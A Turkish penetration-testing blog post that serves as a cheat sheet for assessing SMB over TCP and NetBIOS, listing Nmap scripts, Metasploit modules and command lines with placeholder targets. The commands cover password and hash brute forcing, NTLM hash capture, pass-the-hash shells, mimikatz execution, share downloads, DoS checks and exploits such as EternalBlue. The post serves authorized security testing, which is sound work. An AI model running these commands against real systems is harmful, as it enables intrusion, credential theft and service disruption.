Sızma Testlerinde ve Denetimlerde En Çok Karşılaşılan Servisleri Değerlendirme: SMB over TCP ve SMB over NetBIOS

0
2911
views
Sızma testleri ve denetimler sırasında çeşitli servisler ile karşılaşılır. Bu servislerin keşfi, incelenmesi, güvenlik denetimlerinin gerçekleştirilmesi, istismarı, yapılandırma dosyalarının incelenmesi gibi bir çok adım bulunmaktadır. Bu yazıda SMB protokolunün TCP ve NETBIOS üzerinden taşınan türleri için temel bilgiler verildikten sonra, sızma testleri ve denetimlerde işletilebilecek adımlar incelenecektir.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

İncelenecek olan servislerde hedeflenen amaca ulaşmak için Nmap *.nse betikleri, Metasploit modülleri, Exploit-DB & SearchSploit kodları ve çeşitli araçlar kullanılabilir.

Not: Nmap betikleri kullanılırken sürüm bilgisinin (“-sV“) kontrolü de tavsiye edilmektedir.

 

SMB over TCP: Server Message Block [TCP/445]

Bir bilgisayardaki uygulamaların dosya okuyup yazmasına ve bir bilgisayar ağındaki sunucu programlarından hizmetler (yazıcı gibi) istemesine izin veren bir ağ dosya paylaşım protokolüdür. IBM tarafından tasarlanan Common Internet File System (CIFS), Microsoft tarafından özelleştirilerek SMB olarak adlandırılmıştır.

SMB protokolü OSI modelinde uygulama (7.) ve sunum (6.) katmanda kullanılır. Taşıma işlemi ise daha alt seviyedeki katmanlarda TCP veya NetBIOS üzerinden gerçekleştirilebilir. Bu başlık altında da TCP üzerinden çalışan SMB protokolü incelenecektir. SMB over TCP erişiminde NetBIOS kullanılmadığından Direct-hosted SMB olarak da kullanılmaktadır.

SMB protokolünün bir çok sürümü vardır. SMB protokolünün sürümünü tanımlayan mesaj paketi dizisine diyalekt (Dialect) adı verilir. Bu sürümler ve kullanıldıkları işletim sistemleri aşağıdaki gibi listelenebilir.

  • CIFS: Microsoft NT 4.0 (1996)
  • SMB 1.0 : Windows 2000, Windows XP, Windows Server 2003, Windows Server 2003 R2
  • SMB 2.0: Windows Vista
  • SMB 2.1: Windows 7, Windows Server 2008 R2
  • SMB 3.0: Windows 8, Windows Server 2012
  • SMB 3.0.2: Windows 8.1, Windows Server 2012 R2
  • SMB 3.1.1: Windows 10, Windows Server 2016 (AES 128 GCM & AES 128 CCM)

 

Kali üzerinde kurulu olmayan araçların listesi aşağıdaki gibi listelenebilir.

  • CrackMapExec: https://github.com/byt3bl33d3r/CrackMapExec
    • Hedef verilmesi:
      • HedefIP
      • HedefIP/24
    • Kimlik Bilgisi verilmesi:
      • -d EtkiAlaniAdi -u KullaniciAdi -p ParolaDegeri
      • -d EtkiAlaniAdi -u Kullanicilar.liste -p Parolalar.liste
      • -d EtkiAlaniAdi -u Kullanicilar.liste -H ParolaOzetleri.liste
      • -C KullaniciAdiParola.liste

 

Bu servise bağlantı kurmak için çeşitli araçlar vardır.

  • Linux
    • smbclient
    • smbget
    • /usr/share/doc/python-impacket/examples/ altındaki Python betikleri
      • smbexec.py ve psexec.py betikleri eş değerdir.
      • wmiexec.py ise TCP\445 haricinde TCP\49154 ve TCP\135 portlarını da kullanır.
    • apt-get install smb4k
  • Windows:
    • net use

 

SMB sürümü öğrenilebilir.

  • MSF: auxiliary/scanner/smb/smb_version
  • MSF: auxiliary/scanner/smb/smb1
  • MSF: auxiliary/scanner/smb/smb2

 

Challenge Response destek durumu ve SMB imzalama desteği kontrol edilebilir.

  • Nmap: smb-security-mode
  • Nmap: smb2-security-mode

 

Linux üzerinde SMB paylaşımı açılabilir.

  • python /usr/share/doc/python-impacket/examples/smbserver.py PAYLASIM /tmp/
  • python /usr/share/doc/python-impacket/examples/smbserver.py -u KullaniciAdi -p ParolaDegeri PAYLASIM pwd

 

Gönderilen sorgularına cevaplara göre SMB sürümünün protokolleri tespit edilebilir.

  • Nmap: smb-protocols
  • Nmap: smb2-capabilities

 

Master Browser bilgileri listelenebilir.

  • Nmap: smb-mbenum

 

İşletim sistemi sürüm bilgisi elde edilebilir.

  • Nmap: smb-os-discovery -O
  • xprobe2 (Tavsiye edilmemektedir)

 

Anonim paylaşımların içeriği (NULL Session) listelenebilir.

  • smbclient -L HedefIP -N
  • smbmap -H HedefIP
  • smbmap -H HedefIP -R
  • net use \\HedefIP\IPC$ “” /u:””
  • rpcclient HedefIP -U “” -N EtkiAlaniAdi\\KullaniciAdi

 

Guest yetkisi ile paylaşımlar ve yetkilendirmesi listelenebilir.

  • smbget -a smb://HedefIP/PaylasimDizini -R

 

Paylaşılan yazıcılar listelenebilir.

  • net view \\HedefIP

 

Paylaşılan yazıcılar üzerinden çıktı alınabilir.

  • Nmap: smb-print-text

 

Sistem saati ve SMB servisinin ilk başlangıç zamanını tespit edilebilir.

  • Nmap: smb2-time

 

Bilgisayara bırakılmış olan arka kapılar listelenebilir.

  • Nmap: stuxnet-detect
  • Nmap: smb-double-pulsar-backdoor

 

RID tekneği ile kullanıcı isimleri tespit edilebilir.

  • Nmap: smb-enum-users
  • MSF: auxiliary/scanner/smb/smb_lookupsid
  • crackmapexec HedefIP/24 -d EtkiAlaniAdi -u Kullanicilar.liste -p Parolalar.list –rid-brute

 

Genel bir bilgi toplama işlemi gerçekleştirilebilir. SMB sunucusu sürümü, etki alanı adı, Nbtstat bilgisi, MAC adresi, işletim sistemi, kullanıcıları (querydispinfo ve enumdomusers), paylaşım dizinleri, anonim paylaşım kontrolü, parola politikası (rpcclient üzerinden), grupları, grupların üyeleri, RID ve SID bilgisi,… elde edilebilir.

  • enum4linux -a HedefIP

 

SMB servisi başlatılabilir. Böylece, ağ dinlenerek, ağdaki kullanıcılara ait NTLM/LM parola özetleri ile şifrelenmiş Challenge değerleri toplanabilir.

  • MSF: auxiliary/server/capture/smb
  • MSF: auxiliary/spoof/nbns/nbns_response

 

Oturum açılabilecek geçerli kullanıcılar veya parolalar tespit edilebilir.

  • Nmap: smb-brute –script-args userdb=Kullanicilar.liste,passdb=Parolalar.liste,smblockout=1
  • MSF: auxiliary/scanner/smb/smb_login
  • hydra -t 2 -L Kullanicilar.liste -P Parolalar.liste -M HedefIPler.liste -s HedefPort smb
  • medusa -t 2 -T 2 -U Kullanicilar.liste -P Parolalar.liste -H HedefIPler.liste -n HedefPort -M smbnt
  • crackmapexec HedefIP/24 -d EtkiAlaniAdi -u Kullanicilar.liste -p Parolalar.list

 

Oturum açılabilecek geçerli kullanıcılar veya parola özetleri tespit edilebilir.

  • MSF: auxiliary/scanner/smb/smb_login
  • hydra -t 2 -L Kullanicilar.liste -P ParolaOzetleri.liste -M HedefIPler.liste -s HedefPort -m “LocalHash” smb
  • medusa -t 2 -T 2 -U Kullanicilar.liste -P ParolaOzetleri.liste -H HedefIPler.liste -n HedefPort -m PASS:HASH -M smbnt
  • crackmapexec HedefIP/24 -d EtkiAlaniAdi -u Kullanicilar.liste -H ParolaOzetleri.liste

 

Kimlik bilgileri kullanılarak detaylı bilgi toplama işlemi gerçekleştirilebilir.

  • enum4linux -u EtkiAlaniAdi\\KullaniciAdi -p ParolaDegeri -a HedefIP

 

Kimlik bilgileri kullanılarak paylaşımlar ve yetkilendirmesi listelenebilir.

  • Nmap: smb-enum-shares –script-args smbdomain=EtkiAlaniAdi,smbuser=KullaniciAdi,smbpass=ParolaDegeri
  • Nmap: smb-ls –script-args smbdomain=EtkiAlaniAdi,smbuser=KullaniciAdi,smbpass=ParolaDegeri,share=’PaylasimDizini’
  • Nmap: smb-enum-shares,smb-ls –script-args smbdomain=EtkiAlaniAdi,smbuser=KullaniciAdi,smbpass=ParolaDegeri
  • smbclient //HedefIP/PaylasimDizini -U EtkiAlaniAdi\\KullaniciAdi -p HedefPort
  • MSF: auxiliary/scanner/smb/smb_enumshares
  • smbmap –host-file /TamDizin/HedefIPler.liste -d EtkiAlaniAdi -u KullaniciAdi -p ParolaDegeri -R
  • smbmap -H HedefIP -R PaylasimDizini -A ArananDosyaAdi
  • pth-smbclient -U “EtkiAlaniAdi/KullaniciAdi%ParolaDegeri //HedefIP/PaylasimDizini
  • crackmapexec HedefIP/24 -d EtkiAlaniAdi -u KullaniciAdi -p ParolaDegeri –shares

 

Kimlik bilgileri kullanılarak paylaşımdaki veriler indirilebilir.

  • smbget smb://HedefIP/PaylasimDizini –user=EtkiAlaniAdi\\KullaniciAdi -R
  • mount -t cifs -o username=KullaniciAdi,password=ParolaDegeri,domain=EtkiAlaniAdi //HedefIP/PaylasimDizini /root/Desktop/Paylasim
  • smbmount //HedefIP/PaylasimDizini /root/Desktop/Paylasim -o username=KullaniciAdi,password=ParolaDegeri,rw
  • net use T: \\HedefIP\PaylasimDizini ParolaDegeri /user:EtkiAlaniAdi\KullaniciAdi /savecred /p:no
  • MSF: post/windows/gather/enum_shares

 

Kimlik bilgileri kullanılarak yerel (ve bilgisayarın dahil olduğu etki alanındaki) kullanıcılar listelenebilir.

  • Nmap: smb-enum-users –script-args smbdomain=EtkiAlaniAdi,smbuser=KullaniciAdi,smbpass=ParolaDegeri
  • MSF: auxiliary/scanner/smb/smb_enumusers
  • MSF: auxiliary/scanner/smb/smb_enumusers_domain

 

Kimlik bilgileri kullanılarak yerel gruplar listelenebilir.

  • Nmap: smb-enum-groups –script-args smbdomain=EtkiAlaniAdi,smbuser=KullaniciAdi,smbpass=ParolaDegeri

 

Kimlik bilgileri kullanılarak etki alanı hakkında parola politikası, kullanıcılar,… vb. bilgiler listelenebilir.

  • Nmap: smb-enum-domains –script-args smbdomain=EtkiAlaniAdi,smbuser=KullaniciAdi,smbpass=ParolaDegeri

 

Kimlik bilgileri kullanılarak işletim sistemi bilgisi, donanım, web tarayıcısı,… vb. bilgiler listelenebilir.

  • Nmap: smb-system-info –script-args smbdomain=EtkiAlaniAdi,smbuser=KullaniciAdi,smbpass=ParolaDegeri (Remote Registry servisi üzerinden)

 

Kimlik bilgileri kullanılarak isimlendirilmiş Pipe bilgileri listelenebilir.

  • MSF: auxiliary/scanner/smb/pipe_auditor

 

Mevcut parola değiştirilebilir.

  • smbpasswd -r HedefIP -U KullaniciAdi

 

Kimlik bilgileri kullanılarak işletim sisteminde çalışan proses bilgileri listelenebilir.

  • Nmap: smb-enum-processes –script-args smbdomain=EtkiAlaniAdi,smbuser=KullaniciAdi,smbpass=ParolaDegeri

 

Kimlik bilgileri kullanılarak işletim sisteminde çalışan servis bilgileri listelenebilir.

  • Nmap: smb-enum-services –script-args smbdomain=EtkiAlaniAdi,smbuser=KullaniciAdi,smbpass=ParolaDegeri (Remote Registry servisi üzerinden)

 

Kullanıcı adı ve parola (veya parola özeti) bilgileri kullanılarak (yerel yönetici yetkisi elde edilebilen sistemlerde) oturum açan kullanıcılar listelenebilir.

  • Nmap: smb-enum-sessions –script-args smbdomain=EtkiAlaniAdi,smbuser=KullaniciAdi,smbpass=ParolaDegeri
  • MSF: auxiliary/scanner/smb/psexec_loggedin_users
  • crackmapexec HedefIP/24 -C KullaniciAdiParola.liste –lusers

 

Kimlik bilgileri kullanılarak işletim sistemi SMB sunucu istatistik bilgileri listelenebilir.

  • Nmap: smb-server-stats –script-args smbdomain=EtkiAlaniAdi,smbuser=KullaniciAdi,smbpass=ParolaDegeri

 

Kimlik bilgileri kullanılarak bilgisayarın dahil olduğu etki alanındaki grup ilkelerinde (Group Policy Preference) kayıtlı parolalar tespit edilebilir.

  • MSF: auxiliary/scanner/smb/smb_enum_gpp

 

Kimlik bilgileri kullanılarak SMB paylaşımındaki dosyalaralınabilir.

  • smbclient //HedefIP/PaylasimDizini -U EtkiAlaniAdi\\KullaniciAdi ParolaDegeri -p HedefPort
    • recurse ON
    • prompt OFF
    • mget *

 

Kimlik bilgileri kullanılarak SMB komut satırına erişim sağlanabilir.

  • smbclient //HedefIP/PaylasimDizini -U EtkiAlaniAdi\\KullaniciAdi ParolaDegeri -p HedefPort
  • smbclient \\\\HedefIP\\PaylasimDizini -W WORKGROUP -U KullaniciAdi ParolaDegeri -p HedefPort

 

Kimlik bilgileri kullanılarak MS-RPC komut satırına erişim sağlanabilir.

  • rpcclient HedefIP -U EtkiAlaniAdi\\KullaniciAdi

 

Kullanıcı adı ve parola bilgileri kullanılarak (yerel yönetici yetkisi elde edilebilen sistemlerde) komut çalıştırılabilir.

  • Nmap: smb-psexec.nse –script-args=smbuser=Kullanicilar.liste,smbpass=Parolalar.liste
  • smbmap –host-file /TamDizin/HedefIPler.liste -d EtkiAlaniAdi -u KullaniciAdi -p ParolaDegeri -x “net user”
  • winexe -U EtkiAlaniAdi\\KullaniciAdi%ParolaDegeri //HedefIP “net user”
  • crackmapexec HedefIP -u KullaniciAdi -p ParolaDegeri -M mimikatz -o COMMAND=privilege::debug

 

Kullanıcı adı ve parola bilgileri kullanılarak (yerel yönetici yetkisi elde edilebilen sistemlerde) Windows komut satırına (Meterpreter, CMD, Powershell,…) erişim sağlanabilir.

  • winexe -U EtkiAlaniAdi\\KullaniciAdi%ParolaDegeri //HedefIP “cmd.exe” –system
  • pth-winexe -U EtkiAlaniAdi/KullaniciAdi%ParolaDegeri //HedefIP cmd.exe –system
  • MSF: exploit/windows/smb/psexec
  • MSF: exploit/windows/smb/psexec_psh
  • MSF: exploit/windows/smb/smb_delivery
  • Impacket: python psexec.py EtkiAlaniAdi/KullaniciAdi:ParolaDegeri@HedefIP
  • Impacket: python smbexec.py EtkiAlaniAdi/KullaniciAdi:ParolaDegeri@HedefIP
  • Impacket: python wmiexec.py EtkiAlaniAdi/KullaniciAdi:ParolaDegeri@HedefIP
  • Windows Sysinternals: psexec.exe \\HedefIP -u EtkiAlaniAdi\KullaniciAdi -p ParolaDegeri cmd.exe /accepteula

 

Kullanıcı adı ve parola özeti bilgileri kullanılarak (yerel yönetici yetkisi elde edilebilen sistemlerde) Windows komut satırına (Meterpreter, CMD, Powershell,…) erişim sağlanabilir.

  • pth-winexe -U EtkiAlaniAdi\\KullaniciAdi%ParolaOzetiDegeri //HedefIP “cmd.exe” –system
  • MSF: exploit/windows/smb/psexec
  • MSF: exploit/windows/smb/psexec_psh
  • Impacket: python psexec.py EtkiAlaniAdi/KullaniciAdi@HedefIP -hashes ParolaOzetDegeri
  • Impacket: python smbexec.py EtkiAlaniAdi/KullaniciAdi@HedefIP -hashes ParolaOzetDegeri
  • Impacket: python wmiexec.py EtkiAlaniAdi/KullaniciAdi@HedefIP -hashes ParolaOzetDegeri

 

Bu servisi kullanan DOS zafiyetleri tespit edilebilir.

  • MS09-050: Microsoft Windows SMB2 _Smb2ValidateProviderCallback() Vulnerability (975497) (uncredentialed check) [CVE-2009-2526]
    • Nmap: smb-vuln-cve2009-3103
    • MSF: auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh
  • MS10-006: Vulnerabilities in SMB Client Could Allow Remote Code Execution (978251)
    • MSF: auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop
  • MS10-054: Vulnerabilities in SMB Server Could Allow Remote Code Execution (982214) [CVE-2010-2551] [CVE-2010-2552]
    • Nmap: smb-vuln-ms10-054 –script-args unsafe=1
  • Service regsvc vulnerability [CVE-2010-2550]
    • Nmap: smb-vuln-regsvc-dos
  • SMB DOS
    • Nmap: smb-flood –script-args smbdomain=EtkiAlaniAdi,smbuser=KullaniciAdi,smbpass=ParolaDegeri

 

Bu servisi kullanan çeşitli zafiyetli sistemler tespit edilebilir.

  • MS03-026: Buffer Overrun In RPC Interface Could Allow Code Execution (823980) [CAN-2003-0352]
    • ***
  • MS06-025: Vulnerability in Routing and Remote Access Could Allow Remote Code Execution (911280) [CVE-2006-2370]
    • Nmap: smb-vuln-ms06-025 –script-args unsafe=1
  • MS06-040: Vulnerability in Server Service Could Allow Remote Code Execution (921883) (uncredentialed check) [CVE-2006-3439]
    • ***
  • MS07-029: Vulnerability in Windows DNS RPC Interface Could Allow Remote Code Execution (935966) [CVE-2007-1748]
    • Nmap: smb-vuln-ms07-029 –script-args unsafe=1
  • MS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution (958644) (uncredentialed check) [CVE-2008-4250]
    • Nmap: smb-vuln-ms08-067 –script-args unsafe=1
    • Nmap: smb-vuln-conficker –script-args unsafe=1
  • MS09-001: Microsoft Windows SMB Vulnerabilities Remote Code Execution (958687) (uncredentialed check) [CVE-2008-4834]
    • ***
  • MS09-050: Microsoft Windows SMB2 _Smb2ValidateProviderCallback() Vulnerability (975497) (uncredentialed check) [CVE-2009-3103] [CVE-2009-2532]
    • Nmap: smb-vuln-cve2009-3103 –script-args unsafe=1
    • MSF: auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh
  • MS10-012: Vulnerabilities in SMB Server Could Allow Remote Code Execution (971468) [CVE-2010-0020]
    • ***
  • MS10-054: Vulnerabilities in SMB Server Could Allow Remote Code Execution (982214) [CVE-2010-2550]
    • ***
  • MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) [CVE-2010-2729]
    • Nmap: smb-vuln-ms10-061 –script-args unsafe=1
  • MS11-020: Vulnerability in SMB Server Could Allow Remote Code Execution (2508429) [CVE-2011-0661]
    • ***
  • MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (uncredentialed check) [CVE-2017-0143]
    • Nmap: smb-vuln-ms17-010 –script-args unsafe=1
    • MSF: auxiliary/scanner/smb/smb_ms17_010
  • Diğerleri:
    • SMBv2 servisinin yeniden başlatıldığı zamana göre zafiyetler litelenebilir.
      • Nmap: smb2-vuln-uptime –script-args smb2-vuln-uptime.skip-os=true

 

Bu servisi kullanan çeşitli zafiyetli sistemler istismar edilebilir.

  • MS03-026: Buffer Overrun In RPC Interface Could Allow Code Execution (823980) [CAN-2003-0352]
    • Exploit-DB: 66.c
  • MS06-025: Vulnerability in Routing and Remote Access Could Allow Remote Code Execution (911280) [CVE-2006-2370]
    • ***
  • MS06-040: Vulnerability in Server Service Could Allow Remote Code Execution (921883) (uncredentialed check) [CVE-2006-3439]
    • MSF: exploit/windows/smb/ms06_040_netapi ***
  • MS07-029: Vulnerability in Windows DNS RPC Interface Could Allow Remote Code Execution (935966) [CVE-2007-1748]
    • ***
  • MS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution (958644) (uncredentialed check) [CVE-2008-4250]
    • Exploit-DB: 7132.py ***
    • MSF: use exploit/windows/smb/ms08_067_netapi ***
  • MS09-001: Microsoft Windows SMB Vulnerabilities Remote Code Execution (958687) (uncredentialed check) [CVE-2008-4834]
    • ***
  • MS09-050: Microsoft Windows SMB2 _Smb2ValidateProviderCallback() Vulnerability (975497) (uncredentialed check) [CVE-2009-3103] [CVE-2009-2532]
    • MSF: exploit/windows/smb/ms09_050_smb2_negotiate_func_index
  • MS10-012: Vulnerabilities in SMB Server Could Allow Remote Code Execution (971468) [CVE-2010-0020]
    • ***
  • MS10-054: Vulnerabilities in SMB Server Could Allow Remote Code Execution (982214) [CVE-2010-2550]
    • ***
  • MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) [CVE-2010-2729]
    • ***
  • MS11-020: Vulnerability in SMB Server Could Allow Remote Code Execution (2508429) [CVE-2011-0661]
    • ***
  • MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (uncredentialed check) [CVE-2017-0143]
    • Nmap: smb-vuln-ms17-010 –script-args unsafe=1
    • MSF: exploit/windows/smb/ms17_010_eternalblue

 

SMB over NetBIOS  [UDP\137, UDP\138, TCP\137, TCP\139]

SMB protokolü taşıma işlemini NetBIOS üzerinden de gerçekleştirebilir. Windows Server 2000 ve öncesi sistemleri desteklemek için bu protokol kullanılmaktadır. Ancak broadcast trafik ve performans problemleri sebebi ile kullanılmamaya başlanmıştır.

Challenge Response destek durumu ve SMB imzalama desteği kontrol edilebilir.

  • Nmap: smb-security-mode
  • Nmap: smb2-security-mode

 

Gönderilen sorgularına cevaplara göre SMB sürümünün protokolleri tespit edilebilir.

  • Nmap: smb-protocols
  • Nmap: smb2-capabilities

 

İşletim sistemi sürüm bilgisi elde edilebilir.

  • Nmap: smb-os-discovery -O

 

Paylaşılan yazıcılar listelenebilir.

  • net view \\HedefIP

 

RID tekneği ile kullanıcı isimleri tespit edilebilir.

  • Nmap: smb-enum-users

 

Oturum açılabilecek geçerli kullanıcılar veya parolalar tespit edilebilir.

  • Nmap: smb-brute –script-args userdb=Kullanicilar.liste,passdb=Parolalar.liste,smblockout=1

 

Kimlik bilgileri kullanılarak paylaşımlar ve yetkilendirmesi listelenebilir.

  • Nmap: smb-enum-shares –script-args smbdomain=EtkiAlaniAdi,smbuser=KullaniciAdi,smbpass=ParolaDegeri
  • smbclient -L //HedefIP/PaylasimDizini -U EtkiAlaniAdi\\KullaniciAdi -p HedefPort

 

Kimlik bilgileri kullanılarak yerel (ve bilgisayarın dahil olduğu etki alanındaki) kullanıcılar listelenebilir.

  • Nmap: smb-enum-users –script-args smbdomain=EtkiAlaniAdi,smbuser=KullaniciAdi,smbpass=ParolaDegeri

 

Kimlik bilgileri kullanılarak yerel gruplar listelenebilir.

  • Nmap: smb-enum-groups –script-args smbdomain=EtkiAlaniAdi,smbuser=KullaniciAdi,smbpass=ParolaDegeri

 

Kimlik bilgileri kullanılarak etki alanı hakkında parola politikası, kullanıcılar,… vb. bilgiler listelenebilir.

  • Nmap: smb-enum-domains –script-args smbdomain=EtkiAlaniAdi,smbuser=KullaniciAdi,smbpass=ParolaDegeri

 

Kimlik bilgileri kullanılarak işletim sistemi bilgisi, donanım, web tarayıcısı,… vb. bilgiler listelenebilir.

  • Nmap: smb-system-info –script-args smbdomain=EtkiAlaniAdi,smbuser=KullaniciAdi,smbpass=ParolaDegeri (Remote Registry servisi üzerinden)

 

Kimlik bilgileri kullanılarak işletim sisteminde çalışan proses bilgileri listelenebilir.

  • Nmap: smb-enum-processes –script-args smbdomain=EtkiAlaniAdi,smbuser=KullaniciAdi,smbpass=ParolaDegeri (Remote Registry servisi üzerinden)

 

Kullanıcı adı ve parola (veya parola özeti) bilgileri kullanılarak (yerel yönetici yetkisi elde edilebilen sistemlerde) oturum açan kullanıcılar listelenebilir.

  • Nmap: smb-enum-sessions –script-args smbdomain=EtkiAlaniAdi,smbuser=KullaniciAdi,smbpass=ParolaDegeri

 

Kimlik bilgileri kullanılarak işletim sistemi SMB sunucu istatistik bilgileri listelenebilir.

  • Nmap: smb-server-stats –script-args smbdomain=EtkiAlaniAdi,smbuser=KullaniciAdi,smbpass=ParolaDegeri

 

Kullanıcı adı ve parola bilgileri kullanılarak (yerel yönetici yetkisi elde edilebilen sistemlerde) komut çalıştırılabilir.

  • Nmap: smb-psexec.nse –script-args=smbuser=Kullanicilar.liste,smbpass=Parolalar.liste

 

Bu servisi kullanan DOS zafiyetleri tespit edilebilir.

  • MS09-050: Microsoft Windows SMB2 _Smb2ValidateProviderCallback() Vulnerability (975497) (uncredentialed check) [CVE-2009-2526]
    • Nmap: smb-vuln-cve2009-3103
  • Service regsvc vulnerability [CVE-2010-2550]
    • Nmap: smb-vuln-regsvc-dos
  • SMB DOS
    • Nmap: smb-flood –script-args smbdomain=EtkiAlaniAdi,smbuser=KullaniciAdi,smbpass=ParolaDegeri

 

Bu servisi kullanan çeşitli zafiyetli sistemler tespit edilebilir.

  • MS06-025: Vulnerability in Routing and Remote Access Could Allow Remote Code Execution (911280) [CVE-2006-2370]
    • Nmap: smb-vuln-ms06-025 –script-args unsafe=1
  • MS07-029: Vulnerability in Windows DNS RPC Interface Could Allow Remote Code Execution (935966) [CVE-2007-1748]
    • Nmap: smb-vuln-ms07-029 –script-args unsafe=1
  • MS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution (958644) (uncredentialed check) [CVE-2008-4250]
    • Nmap: smb-vuln-conficker –script-args unsafe=1
  • MS09-050: Microsoft Windows SMB2 _Smb2ValidateProviderCallback() Vulnerability (975497) (uncredentialed check) [CVE-2009-3103] [CVE-2009-2532]
    • Nmap: smb-vuln-cve2009-3103 –script-args unsafe=1

 

Kaynaklar:

http://www.sistemciningunlugu.com/smb-server-message-block-ve-yenilikleri/
https://abcivek.blogspot.com/2016/08/yaygn-kullanlan-servisler-ve-zafiyetleri.html
https://medium.com/@ozersubasi/nedir-bu-smb-824e044e919e
http://www.0daysecurity.com/penetration-testing/enumeration.html
https://www.sans.edu/cyber-research/security-laboratory/article/attacks-browsing
https://resources.infosecinstitute.com/what-is-enumeration/
https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html#
http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines#Internal_Footprinting

 

 

 

 

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.